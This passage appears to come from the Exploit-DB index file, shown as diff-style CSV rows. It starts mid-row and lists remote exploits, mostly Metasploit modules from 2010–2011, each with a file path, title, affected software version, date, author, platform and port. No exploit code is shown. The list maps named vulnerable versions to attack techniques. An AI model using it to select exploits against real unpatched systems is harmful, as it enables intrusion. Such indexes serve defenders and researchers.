(Metasploit)",2010-06-11,Metasploit,remote,windows,8000 +16801,exploits/windows/remote/16801.rb,"CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,5250 +16802,exploits/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,remote,windows, +16803,exploits/windows/remote/16803.rb,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (Metasploit)",2010-07-07,Metasploit,remote,windows,4000 +16804,exploits/windows/remote/16804.rb,"Belkin Bulldog Plus - Web Service Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,80 +16805,exploits/windows/remote/16805.rb,"HP OpenView Network Node Manager (OV NNM) - 'OpenView5.exe' CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,80 +16806,exploits/windows/remote/16806.rb,"BadBlue 2.72b - PassThru Buffer Overflow (Metasploit)",2010-07-08,Metasploit,remote,windows, +16807,exploits/windows/remote/16807.rb,"InterSystems Cache - UtilConfigHome.csp Argument Buffer Overflow (Metasploit)",2010-07-12,Metasploit,remote,windows,57772 +16808,exploits/windows/remote/16808.rb,"NaviCOPA Web Server 2.0.1 - URL Handling Buffer Overflow (Metasploit)",2010-07-12,Metasploit,remote,windows,80 +16809,exploits/win_x86/remote/16809.rb,"Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)",2010-09-20,Metasploit,remote,win_x86,8080 +16810,exploits/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x - 'rembo.exe' Remote Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,443 +16811,exploits/windows/remote/16811.rb,"TrackerCam - PHP Argument Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,8090 +16812,exploits/windows/remote/16812.rb,"Alt-N MDaemon 6.8.5 - WorldClient 'form2raw.cgi' Remote Stack Buffer Overflow (Metasploit)",2010-07-01,Metasploit,remote,windows,3000 +16813,exploits/windows/remote/16813.rb,"Novell NetMail 3.52d - NMAP STOR Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,689 +16814,exploits/windows/remote/16814.rb,"Novell Groupwise Messenger Client - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,8300 +16815,exploits/windows/remote/16815.rb,"Novell ZENworks 6.5 - Desktop/Server Management Overflow (Metasploit)",2010-07-25,Metasploit,remote,windows, +16816,exploits/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 - 'Username' Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,23 +16817,exploits/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,2380 +16818,exploits/windows/remote/16818.rb,"YahooPOPs (YPOPS) 0.6 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,25 +16819,exploits/windows/remote/16819.rb,"SoftiaCom wMailServer 1.0 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,25 +16820,exploits/windows/remote/16820.rb,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)",2010-11-11,Metasploit,remote,windows,25 +16821,exploits/windows/remote/16821.rb,"Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,25 +16822,exploits/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,25 +16823,exploits/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,389 +16824,exploits/windows/remote/16824.rb,"IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,389 +16825,exploits/win_x86/remote/16825.rb,"CA CAM (Windows x86) - 'log_security()' Remote Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,win_x86, +16826,exploits/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service - Remote Buffer Overflow (Metasploit)",2010-05-13,Metasploit,remote,windows,38292 +16827,exploits/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16828,exploits/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 - 'CreateBinding()' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16829,exploits/windows/remote/16829.rb,"Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, +16830,exploits/windows/remote/16830.rb,"Symantec Remote Management - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16831,exploits/windows/remote/16831.rb,"SafeNet SoftRemote - IKE Service Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,62514 +16832,exploits/netware/remote/16832.rb,"Novell NetWare - LSASS CIFS.NLM Driver Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,netware, +16833,exploits/netware/remote/16833.rb,"NetWare 6.5 - SunRPC Portmapper CALLIT Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,netware,111 +16834,exploits/linux/remote/16834.rb,"Snort Back Orifice - Pre-Preprocessor Remote (Metasploit)",2010-07-03,Metasploit,remote,linux, +16835,exploits/linux/remote/16835.rb,"Madwifi - SIOCGIWSCAN Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,linux, +16836,exploits/linux/remote/16836.rb,"Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,linux, +16837,exploits/linux/remote/16837.rb,"hplip - 'hpssd.py' From Address Arbitrary Command Execution (Metasploit)",2010-10-09,Metasploit,remote,linux, +16838,exploits/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)",2011-03-03,Metasploit,remote,linux, +16839,exploits/linux/remote/16839.rb,"Borland Interbase - 'PWD_db_aliased()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,linux, +16840,exploits/linux/remote/16840.rb,"Borland Interbase - 'open_marker_file()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,linux, +16841,exploits/linux/remote/16841.rb,"Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,linux, +16842,exploits/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String (Metasploit)",2010-07-03,Metasploit,remote,linux, +16843,exploits/linux/remote/16843.rb,"Borland Interbase - 'jrd8_create_database()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,linux, +16844,exploits/linux/remote/16844.rb,"Borland Interbase - 'INET_connect()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,linux, +16845,exploits/linux/remote/16845.rb,"PoPToP - Negative Read Overflow (Metasploit)",2010-11-23,Metasploit,remote,linux, +16846,exploits/linux/remote/16846.rb,"UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)",2010-03-26,Metasploit,remote,linux, +16847,exploits/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow (Metasploit)",2010-04-30,Metasploit,remote,linux, +16848,exploits/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)",2010-09-20,Metasploit,remote,linux, +16849,exploits/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,linux, +16850,exploits/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,linux, +16851,exploits/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,remote,linux, +16852,exploits/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit)",2011-01-09,Metasploit,remote,linux, +16853,exploits/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,remote,linux, +16854,exploits/hardware/remote/16854.rb,"Linksys WRT54 Access Point - 'apply.cgi' Remote Buffer Overflow (Metasploit)",2010-09-24,Metasploit,remote,hardware, +16855,exploits/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,linux, +16859,exploits/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,remote,linux, +16860,exploits/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,remote,lin_x86, +16861,exploits/lin_x86/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)",2010-07-14,Metasploit,remote,lin_x86, +16862,exploits/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Remote Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,remote,hardware, +16863,exploits/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,remote,osx, +16864,exploits/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Remote Buffer Overflow (Metasploit)",2010-10-09,Metasploit,remote,osx, +16865,exploits/osx/remote/16865.rb,"Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit)",2010-05-09,Metasploit,remote,osx, +16866,exploits/unix/remote/16866.rb,"Apple Safari - Archive Metadata Command Execution (Metasploit)",2010-09-20,Metasploit,remote,unix, +16867,exploits/osx/remote/16867.rb,"Apple Mac OSX Software Update - Command Execution (Metasploit)",2010-09-20,Metasploit,remote,osx, +16868,exploits/hardware/remote/16868.rb,"Apple iPhone MobileSafari LibTIFF - 'email' Remote Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,remote,hardware, +16869,exploits/hardware/remote/16869.rb,"iPhone MobileMail - LibTIFF Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,hardware, +16870,exploits/multiple/remote/16870.rb,"Apple Mail.app - Image Attachment Command Execution (Metasploit)",2011-03-05,Metasploit,remote,multiple, +16871,exploits/osx/remote/16871.rb,"Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)",2011-01-08,Metasploit,remote,osx, +16872,exploits/osx/remote/16872.rb,"WebSTAR FTP Server - USER Overflow (Metasploit)",2010-09-20,Metasploit,remote,osx, +16873,exploits/osx/remote/16873.rb,"Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit)",2010-10-09,Metasploit,remote,osx, +16874,exploits/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,remote,osx, +16875,exploits/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,remote,osx, +16876,exploits/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)",2010-06-21,Metasploit,remote,osx_ppc, +16878,exploits/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,remote,linux, +16880,exploits/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)",2010-06-17,Metasploit,remote,bsd_x86, +16887,exploits/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,remote,linux, +16888,exploits/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,remote,linux, +16903,exploits/php/remote/16903.rb,"OpenX - 'banner-edit.php' Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,remote,php, +16910,exploits/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection (Metasploit)",2011-01-08,Metasploit,remote,linux, +16915,exploits/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)",2010-10-25,Metasploit,remote,linux, +16916,exploits/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,remote,linux, +16918,exploits/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection (Metasploit)",2010-07-03,Metasploit,remote,freebsd, +16920,exploits/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,remote,linux, +16921,exploits/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,remote,linux, +16922,exploits/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)",2010-12-05,Metasploit,remote,linux, +16924,exploits/linux/remote/16924.rb,"ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit)",2010-10-09,Metasploit,remote,linux, +16925,exploits/linux/remote/16925.rb,"Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)",2010-12-16,Metasploit,remote,linux, +16926,exploits/windows/remote/16926.rb,"Mercantec SoftCart - CGI Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16927,exploits/hp-ux/remote/16927.rb,"HP-UX LPD - Command Execution (Metasploit)",2010-10-06,Metasploit,remote,hp-ux, +16928,exploits/linux/remote/16928.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,linux, +16930,exploits/aix/remote/16930.rb,"ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) (Metasploit)",2010-11-11,Metasploit,remote,aix, +16936,exploits/windows/remote/16936.html,"KingView 6.5.3 SCADA - ActiveX",2011-03-07,"Carlos Mario Penagos Hollmann",remote,windows, +16956,exploits/windows/remote/16956.rb,"Novell iPrint Client 5.52 - ActiveX Control Buffer Overflow (Metasploit)",2011-03-07,Metasploit,remote,windows, +16957,exploits/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows - Payload Execution (Metasploit)",2011-03-08,Metasploit,remote,windows, +16964,exploits/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 - Command Execution (Metasploit)",2011-03-11,Metasploit,remote,unix,8812 +16970,exploits/windows/remote/16970.rb,"Kolibri HTTP Server 2.0 - HEAD Buffer Overflow (Metasploit)",2011-08-03,Metasploit,remote,windows, +16972,exploits/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,remote,ios, +16974,exploits/android/remote/16974.html,"Google Android 2.0/2.1/2.1.1 - WebKit Use-After-Free",2011-03-14,"MJ Keith",remote,android, +16984,exploits/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution (Metasploit)",2011-03-15,Metasploit,remote,windows, +16985,exploits/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,remote,multiple, +16990,exploits/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution (Metasploit)",2011-03-16,Metasploit,remote,multiple, +16993,exploits/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution",2011-03-17,"Todor Donev",remote,hardware, +16998,exploits/windows/remote/16998.rb,"RealNetworks RealPlayer - CDDA URI Initialization (Metasploit)",2011-03-17,Metasploit,remote,windows, +17022,exploits/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",remote,windows, +17024,exploits/windows/remote/17024.txt,"7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",remote,windows, +17027,exploits/windows/remote/17027.rb,"Adobe Flash Player - AVM Bytecode Verification (Metasploit)",2011-03-23,Metasploit,remote,windows, +17028,exploits/windows/remote/17028.rb,"HP OpenView Network Node Manager (OV NNM) - nnmRptConfig nameParams Buffer Overflow (Metasploit)",2011-03-23,Metasploit,remote,windows, +17029,exploits/windows/remote/17029.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe OvJavaLocale' Remote Buffer Overflow (Metasploit)",2011-03-23,Metasploit,remote,windows, +17030,exploits/windows/remote/17030.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe execvp' Remote Buffer Overflow (Metasploit)",2011-03-23,Metasploit,remote,windows, +17031,exploits/linux/remote/17031.rb,"Distributed Ruby - send syscall (Metasploit)",2011-03-23,Metasploit,remote,linux, +17034,exploits/windows/remote/17034.py,"Progea Movicon 11 - 'TCPUploadServer' Remote File System",2011-03-23,"Jeremy Brown",remote,windows, +17038,exploits/windows/remote/17038.rb,"HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe schdParams' Remote Buffer Overflow (Metasploit)",2011-03-24,Metasploit,remote,windows,80 +17039,exploits/windows/remote/17039.rb,"HP OpenView Network Node Manager (OV NNM) - 'snmpviewer.exe' Remote Buffer Overflow (Metasploit)",2011-03-23,Metasploit,remote,windows,80 +17040,exploits/windows/remote/17040.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe ICount' CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,remote,windows,80 +17041,exploits/windows/remote/17041.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe main' Remote Buffer Overflow (Metasploit)",2011-03-23,Metasploit,remote,windows,80 +17042,exploits/windows/remote/17042.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' (MaxAge) CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,remote,windows,80 +17043,exploits/windows/remote/17043.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' Unrecognized Option Buffer Overflow (Metasploit)",2011-03-23,Metasploit,remote,windows, +17044,exploits/windows/remote/17044.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe ovutil' Remote Buffer Overflow (Metasploit)",2011-03-23,Metasploit,remote,windows, +17047,exploits/windows/remote/17047.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe Hostname' CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,remote,windows, +17048,exploits/windows/remote/17048.rb,"VideoLAN VLC Media Player 1.1.4 - 'AMV' Dangling Pointer (Metasploit)",2011-03-26,Metasploit,remote,windows, +17053,exploits/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",remote,windows, +17058,exploits/linux/remote/17058.rb,"Distributed Ruby - Send instance_eval/syscall Code Execution (Metasploit)",2011-03-27,Metasploit,remote,linux, +17063,exploits/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",remote,windows, +17068,exploits/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal",2011-03-29,"AutoSec Tools",remote,multiple, +17078,exploits/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution",2011-03-30,ikki,remote,multiple, +17104,exploits/windows/remote/17104.txt,"RealNetworks RealGames StubbyUtil.ShellCtl.1 - ActiveX Control Multiple Remote Command Executions",2011-04-03,rgod,remote,windows, +17105,exploits/windows/remote/17105.txt,"RealNetworks RealGames StubbyUtil.ProcessMgr.1 - ActiveX Control Multiple Remote Command Executions",2011-04-03,rgod,remote,windows, +17181,exploits/linux/remote/17181.pl,"FiSH-irssi 0.99 - Evil ircd Buffer Overflow",2011-04-17,"Caleb James DeLisle",remote,linux, +17148,exploits/multiple/remote/17148.rb,"Zend Server Java Bridge - Arbitrary Java Code Execution (Metasploit)",2011-04-05,Metasploit,remote,multiple,10001 +17149,exploits/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution (Metasploit)",2011-04-09,Metasploit,remote,windows, +17151,exploits/windows/remote/17151.rb,"IBM Lotus Domino iCalendar - MAILTO Buffer Overflow (Metasploit)",2011-04-04,Metasploit,remote,windows,25 +17152,exploits/windows/remote/17152.rb,"ManageEngine Applications Manager - Authenticated Code Execution (Metasploit)",2011-04-08,Metasploit,remote,windows,9090 +17155,exploits/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' Remote Code Execution",2011-04-12,"Gerry Eisenhaur",remote,windows, +17156,exploits/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",remote,windows, +17175,exploits/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption (Metasploit)",2011-04-16,Metasploit,remote,windows, +17187,exploits/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion (ASLR + DEP Bypass)",2011-04-19,Abysssec,remote,windows, +17195,exploits/windows/remote/17195.rb,"Wireshark 1.4.4 - 'packet-dect.c' Remote Stack Buffer Overflow (Metasploit) (2)",2011-04-19,Metasploit,remote,windows, +17199,exploits/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution (Metasploit)",2011-04-21,Metasploit,remote,unix, +17219,exploits/windows/remote/17219.rb,"EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)",2011-04-27,Metasploit,remote,windows,18821 +17243,exploits/windows/remote/17243.txt,"SPlayer 3.7 (build 2055) - Remote Buffer Overflow",2011-05-04,xsploitedsec,remote,windows, +17240,exploits/windows/remote/17240.html,"ICONICS WebHMI - ActiveX Stack Overflow",2011-05-03,"sgb & bls",remote,windows, +17244,exploits/hardware/remote/17244.txt,"ZyWALL USG Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",remote,hardware, +17252,exploits/windows/remote/17252.rb,"VideoLAN VLC Media Player 1.1.8 - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,remote,windows, +17268,exploits/windows/remote/17268.rb,"SPlayer 3.7 - Content-Type Buffer Overflow (Metasploit)",2011-05-11,Metasploit,remote,windows, +17269,exploits/windows/remote/17269.rb,"ICONICS WebHMI - ActiveX Buffer Overflow (Metasploit)",2011-05-10,Metasploit,remote,windows, +17279,exploits/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,remote,hardware, +17290,exploits/hardware/remote/17290.txt,"XtreamerPRO Media-player 2.6.0/2.7.0 - Multiple Vulnerabilities",2011-05-16,"Itzik Chen",remote,hardware, +17300,exploits/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Remote Stack Overflow (Metasploit)",2011-05-16,Metasploit,remote,windows, +17304,exploits/windows/remote/17304.txt,"Cisco Unified Operations Manager - Multiple Vulnerabilities",2011-05-18,"Sense of Security",remote,windows, +17328,exploits/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,remote,windows, +17345,exploits/windows/remote/17345.py,"HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC)",2011-05-29,fdiskyou,remote,windows, +17339,exploits/windows/remote/17339.py,"HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC)",2011-05-28,fdiskyou,remote,windows, +17352,exploits/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)",2011-05-30,Metasploit,remote,windows, +17354,exploits/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2)",2011-06-01,b33f,remote,windows, +17355,exploits/windows/remote/17355.rb,"Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,remote,windows,21 +17356,exploits/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",remote,hardware, +17359,exploits/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow",2011-06-03,mr.pr0n,remote,windows, +17361,exploits/windows/remote/17361.py,"Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)",2011-06-04,"Glafkos Charalambous",remote,windows, +17365,exploits/windows/remote/17365.py,"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM",2011-06-07,"Jeremy Brown",remote,windows, +17366,exploits/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute (Metasploit)",2011-06-06,Metasploit,remote,windows, +17373,exploits/windows/remote/17373.py,"ActFax Server FTP - Authenticated Remote Buffer Overflow",2011-06-08,b33f,remote,windows, +17374,exploits/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow (Metasploit)",2011-06-09,Metasploit,remote,windows, +17381,exploits/windows/remote/17381.txt,"Simple Web Server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",remote,windows, +17456,exploits/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - 'streamprocess.exe' Remote Buffer Overflow (Metasploit)",2011-06-27,Metasploit,remote,windows, +17392,exploits/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager - POST Query Buffer Overflow (Metasploit)",2011-06-12,Metasploit,remote,windows, +17409,exploits/windows/remote/17409.rb,"Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) (Metasploit)",2011-06-17,Metasploit,remote,windows, +17415,exploits/windows/remote/17415.rb,"Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)",2011-06-20,mr_me,remote,windows, +17416,exploits/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution",2011-06-20,mr_me,remote,windows, +17417,exploits/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow (Metasploit)",2011-06-20,Metasploit,remote,windows, +17419,exploits/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (2)",2011-06-20,Abysssec,remote,windows, +17422,exploits/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,remote,hardware, +17424,exploits/windows/remote/17424.rb,"Black Ice Cover Page - ActiveX Control Arbitrary File Download (Metasploit)",2011-06-21,Metasploit,remote,windows, +17429,exploits/windows/remote/17429.rb,"FactoryLink - 'vrn.exe' Opcode 9 Buffer Overflow (Metasploit)",2011-06-21,Metasploit,remote,windows, +17430,exploits/windows/remote/17430.rb,"Sielco Sistemi Winlog - Remote Buffer Overflow (Metasploit)",2011-06-21,Metasploit,remote,windows, +17434,exploits/windows/remote/17434.rb,"RealWin SCADA Server - DATAC Login Buffer Overflow (Metasploit)",2011-06-22,Metasploit,remote,windows, +17438,exploits/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass",2011-06-23,"Trustwave's SpiderLabs",remote,windows, +17450,exploits/windows/remote/17450.rb,"Siemens FactoryLink 8 - CSService Logging Path Parameter Buffer Overflow (Metasploit)",2011-06-25,Metasploit,remote,windows, +17448,exploits/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)",2011-06-23,Metasploit,remote,windows, +17460,exploits/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,remote,windows, +17462,exploits/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Command Execution",2011-06-30,kingcope,remote,freebsd, +17467,exploits/windows/remote/17467.rb,"HP - 'OmniInet.exe' Opcode 27 Buffer Overflow (Metasploit)",2011-07-01,Metasploit,remote,windows,5555 +17468,exploits/windows/remote/17468.py,"HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)",2011-07-02,"muts & dookie",remote,windows,5555 +17490,exploits/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Remote Buffer Overflow (Metasploit)",2011-07-04,Metasploit,remote,windows, +17491,exploits/unix/remote/17491.rb,"vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)",2011-07-05,Metasploit,remote,unix, +17498,exploits/windows/remote/17498.rb,"Freefloat FTP Server - Remote Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",remote,windows, +17507,exploits/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",remote,hardware, +39661,exploits/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - Remote Overflow (SEH) (Metasploit)",2016-04-05,Metasploit,remote,windows,80 +39662,exploits/windows/remote/39662.rb,"PCMan FTP Server - 'PUT_ Buffer Overflow (Metasploit)",2016-04-05,Metasploit,remote,windows,21 +17513,exploits/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Remote Buffer Overflow (Metasploit)",2011-07-09,Metasploit,remote,windows, +17517,exploits/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - Man In The Middle",2011-07-09,Nibin,remote,windows, +17519,exploits/windows/remote/17519.py,"Freefloat FTP Server - 'LIST' Remote Buffer Overflow",2011-07-10,"Zer0 Thunder",remote,windows, 